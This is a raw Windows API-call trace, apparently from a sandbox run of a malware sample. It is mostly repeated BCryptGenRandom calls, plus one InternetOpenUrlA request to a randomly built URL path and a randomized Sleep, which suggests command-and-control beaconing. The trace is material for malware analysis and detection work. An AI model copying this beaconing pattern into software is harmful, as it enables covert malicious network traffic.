GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0268.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a176a8, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a176a8) returned 0x0 [0268.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0268.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0268.683] GetProcessHeap () returned 0x440000 [0268.683] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0268.683] lstrcpyA (in: lpString1=0x472f30, lpString2="`v¡\x03" | out: lpString1="`v¡\x03") returned="`v¡\x03" [0268.683] lstrcatA (in: lpString1="`v¡\x03", lpString2="/wdbbdjAwr57qahofsjkzx/pvl9op5gdumlUv48ms03vhjb8xyii0fg2dHmc6qu8zulwr47/l1i6tlodmvc2xx6w8t3/" | out: lpString1="`v¡\x03/wdbbdjAwr57qahofsjkzx/pvl9op5gdumlUv48ms03vhjb8xyii0fg2dHmc6qu8zulwr47/l1i6tlodmvc2xx6w8t3/") returned="`v¡\x03/wdbbdjAwr57qahofsjkzx/pvl9op5gdumlUv48ms03vhjb8xyii0fg2dHmc6qu8zulwr47/l1i6tlodmvc2xx6w8t3/" [0268.683] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0268.880] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="`v¡\x03/wdbbdjAwr57qahofsjkzx/pvl9op5gdumlUv48ms03vhjb8xyii0fg2dHmc6qu8zulwr47/l1i6tlodmvc2xx6w8t3/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0268.880] GetProcessHeap () returned 0x440000 [0268.880] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0268.880] GetProcessHeap () returned 0x440000 [0268.880] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17660 | out: hHeap=0x440000) returned 1 [0268.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0268.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0268.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0268.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0268.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0268.881] Sleep (dwMilliseconds=0xf8f3) [0269.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0269.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.042] GetProcessHeap () returned 0x440000 [0269.042] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02b50 [0269.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02b51, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a02b51) returned 0x0 [0269.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02b78, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a02b78) returned 0x0 [0269.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 